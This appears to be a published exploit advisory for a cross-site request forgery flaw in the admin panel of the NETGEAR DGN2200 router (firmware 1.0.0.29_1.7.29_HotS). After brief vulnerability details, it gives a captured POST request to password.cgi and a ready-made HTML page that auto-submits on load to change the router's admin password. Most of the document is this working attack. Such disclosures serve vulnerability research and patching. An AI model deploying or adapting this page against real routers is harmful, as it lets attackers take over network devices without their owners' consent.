NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - CSRF Vulnerability

# Exploit Title: CSRF in NETGEAR DGN2200 Admin panel

 

# Date 02/05/2014

 

# Exploit author: Dolev Farhi @f1nhack

 

# Vendor homepage: http://netgear.com

 

# Affected Firmware version: 1.0.0.29_1.7.29_HotS

 

# Affected Hardware: NETGEAR DGN2200 Wireless ADSL Router

 

 

 

 

Summary

=======

A CSRF Attack was discovered in the Admin panel of NETGEAR DGN2200 Router.

 

Vulnerability Description

=========================

Cross Site Request Forgery attack (CSRF)

 

PoC

====

POST /password.cgi HTTP/1.1

Host: 10.0.0.138

Proxy-Connection: keep-alive

Content-Length: 122

Cache-Control: max-age=0

Authorization: Basic QWRtaW46VG9vbGJveDEj

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://10.0.0.138

User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://10.0.0.138/PWD_password.htm

Accept-Encoding: gzip,deflate,sdch

Accept-Language: en-US,en;q=0.8

  

sysOldPasswd=OLDPASS&sysNewPasswd=NEWPASS&sysConfirmPasswd=NEWPASS&authTimeout=5&cfAlert_Apply=Apply

 

 

Exploit

=========

<html>

<body onload="javascript:document.forms[0].submit()">

<H2>CSRF Exploit to change Admin password</H2>

<form method="POST" name="form0" action="http://10.0.0.138/password.cgi">

<input type="hidden" name="sysOldPasswd" value="OLDPASS"/>

<input type="hidden" name="sysNewPasswd" value="NEWPASS"/>

<input type="hidden" name="sysConfirmPasswd" value="NEWPASS"/>

<input type="hidden" name="authTImeout" value="5"/>

<input type="hidden" name="cfAlert_Apply" value="Apply"/>

</form>

</body>

</html>